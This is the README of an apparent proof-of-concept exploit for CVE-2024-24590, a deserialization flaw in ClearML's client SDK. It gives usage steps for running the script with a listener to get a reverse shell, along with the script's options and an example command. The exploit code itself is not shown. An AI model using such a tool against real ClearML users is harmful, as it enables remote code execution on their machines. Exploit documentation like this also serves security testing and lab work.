# CVE-2024-24590
Deserialization of untrusted data can occur in versions 0.17.0 to 1.14.2 of the client SDK of Allegro AI’s ClearML platform, enabling a maliciously uploaded artifact to run arbitrary code on an end user’s system when interacted with.

## Usage
1) paste the credentials given and run clearml-init
2) run the python script in one terminal and have a listener in another terminal
3) might need to run the exploit many times to get a reverse shell

usage: [-h] -i IP -p PORT -P PROJECT

  -h, --help  show this help message and exit
  -i IP       IP address of the listener
  -p PORT     Port number of the listener
  -P PROJECT  Name of the existing project

example: python -i -p 4444 -P 'Black Swan'
## Exploit details